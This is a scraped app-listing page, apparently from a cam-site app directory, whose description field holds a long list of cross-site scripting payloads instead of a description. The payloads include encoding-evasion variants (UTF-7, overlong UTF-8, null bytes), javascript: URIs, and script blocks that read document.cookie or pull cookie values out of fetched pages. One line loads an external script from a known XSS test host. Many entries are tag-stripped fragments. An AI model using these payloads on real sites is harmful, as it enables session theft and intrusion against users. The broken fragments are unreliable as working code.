|
|
You are viewing version 1229846. There is a newer version of this app. See the latest version of this app.
Short Description:
new
Full Description
'';!--"=&{()}
'';!--"=&{(alert(1))}
`>
”>
”>
'>alert(1)/*
">
#
MouseEvent=function+MouseEvent(){};test=new+MouseEvent();test.isTrusted=true;test.type=%22click%22;getElementById(%22safe123%22).click=function()+{alert(Safe.get());};getElementById(%22safe123%22).click(test);#
#
#
<iframe>#var xhr = new window.XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();
<script>function x(window) { eval(location.hash.substr(1)) }; open(%22javascript:opener.x(window)%22)</script>#var xhr = new window.XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();
<script>Object.defineProperties(window, {Safe: {value: {get: function() {return document.cookie}}}});alert(Safe.get())</script>
<script>var x = document.createElement('iframe');document.body.appendChild(x);var xhr = x.contentWindow.XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();</script>
<script>(function() {var event = document.createEvent(%22MouseEvents%22);event.initMouseEvent(%22click%22, true, true, window, 0, 0, 0, 0, 0, false, false, false, false, 0, null);var fakeData = [event, {isTrusted: true}, event];arguments.__defineGetter__('0', function() { return fakeData.pop(); });alert(Safe.get.apply(null, arguments));})();</script>
<script>var script = document.getElementsByTagName('script')[0]; var clone = script.childNodes[0].cloneNode(true); var ta = document.createElement('textarea'); ta.appendChild(clone); alert(ta.value.match(/cookie = '(.*?)'/)[1])</script>
<script>xhr=new ActiveXObject(%22Msxml2.XMLHTTP%22);xhr.open(%22GET%22,%22/xssme2%22,true);xhr.onreadystatechange=function(){if(xhr.readyState==4%26%26xhr.status==200){alert(xhr.responseText.match(/'([^']%2b)/)[1])}};xhr.send();</script>
<script>alert(document.documentElement.innerHTML.match(/'([^']%2b)/)[1])</script>
<script>alert(document.getElementsByTagName('html')[0].innerHTML.match(/'([^']%2b)/)[1])</script>
<%73%63%72%69%70%74> %64 = %64%6f%63%75%6d%65%6e%74%2e%63%72%65%61%74%65%45%6c%65%6d%65%6e%74(%22%64%69%76%22); %64%2e%61%70%70%65%6e%64%43%68%69%6c%64(%64%6f%63%75%6d%65%6e%74%2e%68%65%61%64%2e%63%6c%6f%6e%65%4e%6f%64%65(%74%72%75%65)); %61%6c%65%72%74(%64%2e%69%6e%6e%65%72%48%54%4d%4c%2e%6d%61%74%63%68(%22%63%6f%6f%6b%69%65 = '(%2e%2a%3f)'%22)[%31]); </%73%63%72%69%70%74>
<script> var xdr = new ActiveXObject(%22Microsoft.XMLHTTP%22); xdr.open(%22get%22, %22/xssme2%3Fa=1%22, true); xdr.onreadystatechange = function() { try{ var c; if (c=xdr.responseText.match(/document.cookie = '(.*%3F)'/) ) alert(c[1]); }catch(e){} }; xdr.send(); </script>
<iframe id=%22ifra%22 src=%22/%22>
'
-->"/*/alert()/*
“>
“>
+-+-1-+-+alert(1)
alert(1) ?
">
">
">
">
<% foo>
+ADw-script+AD4-alert(1)+ADw-/script+AD4+/v9
+ADw-script+AD4-alert(1)+ADw-/script+AD4+/v+
+ADw-script+AD4-alert(1)+ADw-/script+AD4+/v/
+ADw-script+AD4-alert(1)+ADw-/script+AD4-
%C0%BCscript>alert(1)
%E0%80%BCscript>alert(1)
%F0%80%80%BCscript>alert(1)
%F8%80%80%80%BCscript>alert(1)
%FC%80%80%80%80%BCscript>alert(1)
<
<
javascript:alert(1);
javascript:alert(1);
javascript:alert(1);
javascript:alert(1);
javascript:alert(1);
javascript:alert(1);
javascript:alert(1);
'`"><\x3Cscript>javascript:alert(1)
'`"><\x00script>javascript:alert(1)
\x3Cscript>javascript:alert(1)
'"`>
'`"><\x3Cscript>javascript:alert(1)
'`"><\x00script>javascript:alert(1)
javascript:alert(1);
javascript:alert(1);
javascript:alert(1);
javascript:alert(1);
javascript:alert(1);
javascript:alert(1);
javascript:alert(1);
"`'>
"`'>
"`'>
"`'>
"`'>
"`'>
"`'>
"`'>
"`'>
"`'>
"`'>
"`'>
"`'>
"`'>
"`'>
"`'>
"`'>
"`'>
"`'>
"`'>
"`'>
"`'>
"`'>
"`'>
"`'>
"`'>
"`'>
"`'>
"`'>
"`'>
"`'>
"`'>
"`'>
"`'>
"`'>
"`'>
"`'>
javascript:alert(1)
javascript:alert(1)
javascript:alert(1)
javascript:alert(1)
javascript:alert(1)
javascript:alert(1)
javascript:alert(1)
<
>">'>
¼script¾alert(¢XSS¢)¼/script¾
PT SRC="http://ha.ckers.org/xss.js">
/*%00*/alert(1)/*%00*/
/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/alert(0%0)
+-+-1-+-+alert(1)
alert(1)
//|\\
http://www.$=1,alert($)//INJECTX
"/*/alert()/*
+ADw-script+AD4-alert(+ACc-utf-7!+ACc-)+ADw-+AC8-script+AD4-
+ADw-script+AD4-alert(+ACc-xss+ACc-)+ADw-+AC8-script+AD4-
<%00script>alert(‘XSS’)<%00/script>
<%script>alert(‘XSS’)<%/script>
<
© Copyright Chaturbate 2011- 2026. All Rights Reserved.